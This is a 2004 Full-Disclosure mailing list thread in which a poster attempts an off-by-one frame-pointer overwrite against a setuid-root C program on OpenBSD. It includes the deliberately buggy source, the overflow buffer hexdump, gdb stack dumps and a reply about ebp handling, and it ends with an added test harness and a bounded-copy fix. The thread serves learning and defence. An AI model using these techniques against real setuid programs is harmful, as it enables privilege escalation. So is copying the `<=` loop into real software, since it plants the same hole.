From: Jason.Deckard at webmd.net (Deckard, Jason)
Subject: exploiting off by one

Hi Joe,

I don't think the value in ebp is being used by main's caller. As you know, the calling convention requires the called procedure to preserve the state of ebp, but that is no guarantee that the caller will use ebp to restore esp.

Looking at a disassembled version of your code, I can see gcc (version 3.2.3 here) reclaims the parts of the stack used by parameters by increasing esp with a constant value. For example:

    lea    0xffffff78(%ebp),%eax
    push   %eax
    call   80482c8
    add    $0x8,%esp

I suspect something similar is being done by main's caller.

My apologies if I'm missing something obvious here.

Regards,
Jason Deckard

-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Joe Hickory
Sent: Thursday, April 15, 2004 2:26 AM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] exploiting off by one

Hi fd,

I'm trying to exploit some overflows to see how it works. I can exploit a "normal" stack overflow without problem, but now I'm trying to exploit an off-by-one overflow and have some questions. First see what I did:

Vulnerable program:

    #include <stdio.h>
    #include <string.h>      /* strlen() */
    #include <unistd.h>
    #include <sys/types.h>

    #define BUFSIZE 128

    int main(int argc, char **argv)
    {
        char buffer[BUFSIZE];
        int i, bufsiz;
        uid_t userid;

        bufsiz = BUFSIZE;
        userid = geteuid();
        setuid(userid);
        printf("userid: %i \n", userid);
        printf("buffsize: %i \n", (int)sizeof(buffer));
        printf("buffsize: %i \n", bufsiz);

        /* deliberate off-by-one: `<=` copies BUFSIZE + 1 bytes, so the last
         * iteration writes the byte that sits right after buffer on the stack */
        for (i = 0; i <= sizeof(buffer); i++) {
            buffer[i] = argv[1][i];
        }

        /* buffer is never NUL-terminated by the loop above */
        printf("buffsize: %i \n", (int)strlen(buffer));
        printf("buffer: %s\n", buffer);
        return 0;
    }

    $ ls -l
    -rwsr-xr-x  1 root  wheel  7788 Apr 14 23:43 offbyone

Starting eggshell:

    $ ./eggframeshell 134 68 1100
    $EGG at: 0xcfbfd634
    last_byte: 44

Overflow buffer:

    $ echo -n $IJV | hexdump -v
    0000000 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
    0000010 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
    0000020 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
    0000030 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
    0000040 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
    0000050 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
    0000060 d634 cfbf d634 cfbf d634 cfbf d634 cfbf
    0000070 d634 cfbf d634 cfbf d634 4444 4444 4444
    0000080 4444 cfbf
    0000084

    $ gdb ./offbyone
    GNU gdb 4.16.1
    Copyright 1996 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-unknown-openbsd3.5"...
    (gdb) break 21
    warning: gdb ignores `const' qualifiers.
    Breakpoint 1 at 0x667: file offbyone.c, line 21.
    (gdb) run $IJV
    Starting program: /./offbyone $IJV
    userid: 1000
    buffsize: 128
    buffsize: 128

    Breakpoint 1, main (argc=2, argv=0xcfbfd220) at offbyone.c:21
    21          printf("buffsize: %i \n", strlen(buffer));
    (gdb) info frame
    Stack level 0, frame at 0xcfbfd1c0:
     eip = 0x667 in main (offbyone.c:21); saved eip 0x4b1
     called by frame at 0xcfbfd144
     source language c.
     Arglist at 0xcfbfd1c0, args: argc=2, argv=0xcfbfd220
     Locals at 0xcfbfd1c0, Previous frame's sp is 0x0
     Saved registers:
      ebx at 0xcfbfd118, ebp at 0xcfbfd1c0, esi at 0xcfbfd11c, eip at 0xcfbfd1c4
    (gdb) x/100x $esp
    0xcfbfd118: 0xcfbfd368 0xcfbfd220 0x00000001 0x00000000
    0xcfbfd128: 0x00000000 0xcfbfd17c 0x48f31671 0x000003e8
    0xcfbfd138: 0x00000080 0x00000081 0xcfbfd634 0xcfbfd634
    0xcfbfd148: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
    0xcfbfd158: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
    0xcfbfd168: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
    0xcfbfd178: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
    0xcfbfd188: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
    0xcfbfd198: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
    0xcfbfd1a8: 0xcfbfd634 0xcfbfd634 0xcfbfd634 0xcfbfd634
    0xcfbfd1b8: 0x4444d634 0x44444444 0xcfbfd144 0x000004b1
    0xcfbfd1c8: 0x00000002 0xcfbfd220 0xcfbfd22c 0xcfbfd368
    0xcfbfd1d8: 0xcfbfd1fc 0x00000385 0x0000049f 0x00000000
    0xcfbfd1e8: 0xcfbfd21c 0x00001000 0x48f2e000 0x00000000
    0xcfbfd1f8: 0x00000410 0xcfbfd21c 0x00000427 0x00000002
    0xcfbfd208: 0xcfbfd220 0xcfbfd22c 0x00000000 0xcfbfdff0
    0xcfbfd218: 0x00000000 0x00000002 0xcfbfd368 0xcfbfd374
    0xcfbfd228: 0x00000000 0xcfbfd3f9 0xcfbfd424 0xcfbfd495
    0xcfbfd238: 0xcfbfd4a3 0xcfbfd4b1 0xcfbfd4c9 0xcfbfd4dd
    0xcfbfd248: 0xcfbfd4f4 0xcfbfd519 0xcfbfd536 0xcfbfd5bf
    0xcfbfd258: 0xcfbfd5ca 0xcfbfd5dd 0xcfbfdddd 0x00000000
    0xcfbfd268: 0x00000003 0x00000034 0x00000004 0x00000020
    0xcfbfd278: 0x00000005 0x00000006 0x00000006 0x00001000
    0xcfbfd288: 0x00000007 0x48f2e000 0x00000008 0x00000000
    0xcfbfd298: 0x00000009 0x00000410 0x00000000 0x00000000
    (gdb)
    (gdb) x/x 0xcfbfd634
    0xcfbfd634: 0x90909090

    $ ./offbyone $IJV
    userid: 0
    buffsize: 128
    buffsize: 128
    buffsize: 134
    buffer: 4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4???4??? 4???4???4???4???4???4???4???4???4???4???4???4?DDDDDDD????
    $

Hope it's enough information. My question is just this: I manipulated the least significant byte of the frame pointer so that it points into my buffer. There in my buffer is the address of my shellcode as the manipulated return address. But the program is not segfaulting, even if the pointer points to $somewhere. It always exits normally, without opening a root shell for me.

I'm using gcc 2.95 on OpenBSD 3.5 (with any stack and anti-overflow protection disabled; a "normal" overflow works well).

Hope anybody can enlighten me.

joe

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
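The `<=` bound in Joe's copy loop next to a bounded replacement, as an added example that is not part of the original thread: the `struct frame` layout, the `guard` byte and the function names are assumptions made so the single-byte overwrite (the 'D', 0x44, that reached the saved ebp's low byte in the post) can be observed in a test instead of on a live stack frame.

```c
#include <string.h>
#define BUFSIZE 128

/* A known byte sits right after buffer so the overwrite is observable; on the
 * real stack that slot held the low byte of the saved frame pointer. */
struct frame { char buffer[BUFSIZE]; unsigned char guard; };

/* The post's loop: `<=` runs i from 0 to BUFSIZE inclusive, so BUFSIZE + 1
 * bytes are stored and the last one lands on guard. Written through a byte
 * pointer over the whole struct so the demo stays well-defined; like the
 * original it never NUL-terminates buffer. Returns the byte count stored. */
size_t copy_off_by_one(struct frame *f, const char *src)
{
    unsigned char *p = (unsigned char *)f;
    size_t i;
    for (i = 0; i <= sizeof f->buffer; i++)   /* the bound should be `<` */
        p[i] = (unsigned char)src[i];
    return i;                                  /* BUFSIZE + 1 */
}

/* Bounded replacement: never writes past buffer, always NUL-terminates, and
 * rejects input that does not fit. Returns the payload length or -1. */
int copy_bounded(struct frame *f, const char *src)
{
    size_t n = 0;
    while (n < sizeof f->buffer && src[n] != '\0')   /* scan at most BUFSIZE */
        n++;
    if (n == sizeof f->buffer) {                      /* no room for the NUL */
        f->buffer[0] = '\0';
        return -1;
    }
    memcpy(f->buffer, src, n + 1);                    /* n bytes plus the NUL */
    return (int)n;
}

/* Runs one copy on a constructed 135-byte argument shaped like the post's
 * $IJV (filler, then 'D' = 0x44 at offset BUFSIZE) and returns the guard byte
 * afterwards; *rc receives the copy function's return value. */
unsigned char guard_after_copy(int bounded, int *rc)
{
    struct frame f;
    char arg[BUFSIZE + 8];
    memset(arg, 'A', sizeof arg - 1);
    arg[BUFSIZE] = 'D';
    arg[sizeof arg - 1] = '\0';
    memset(&f, 0, sizeof f); f.guard = 0xAA;
    *rc = bounded ? copy_bounded(&f, arg) : (int)copy_off_by_one(&f, arg);
    return f.guard;            /* 0x44 for the off-by-one copy, 0xAA bounded */
}
```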